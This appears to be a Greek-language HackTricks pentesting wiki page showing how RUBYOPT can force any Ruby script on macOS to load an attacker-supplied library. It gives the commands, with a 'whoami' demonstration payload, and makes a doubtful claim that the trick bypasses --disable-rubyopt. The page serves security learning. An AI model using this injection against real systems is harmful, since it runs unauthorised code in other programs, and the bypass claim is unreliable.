HackTricksmacOS Ruby Applications Injection
Reading time: 2 minutes
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.
RUBYOPT
Χρησιμοποιώντας αυτήν την μεταβλητή περιβάλλοντος είναι δυνατόν να προσθέσετε νέες παραμέτρους στη ruby όποτε εκτελείται. Αν και η παράμετρος -e δεν μπορεί να χρησιμοποιηθεί για να καθορίσει τον κώδικα ruby προς εκτέλεση, είναι δυνατόν να χρησιμοποιηθούν οι παράμετροι -I και -r για να προστεθεί ένας νέος φάκελος στη διαδρομή φόρτωσης βιβλιοθηκών και στη συνέχεια να καθορίσετε μια βιβλιοθήκη για φόρτωση.
Δημιουργήστε τη βιβλιοθήκη inject.rb στο /tmp:
puts `whoami`
Δημιουργήστε οπουδήποτε ένα σενάριο ruby όπως:
puts 'Hello, World!'
Στη συνέχεια, κάντε ένα αυθαίρετο σενάριο ruby να το φορτώσει με:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Διασκεδαστικό γεγονός, λειτουργεί ακόμη και με την παράμετρο --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Υποστηρίξτε το HackTricks
- Ελέγξτε τα σχέδια συνδρομής!
- Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
- Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.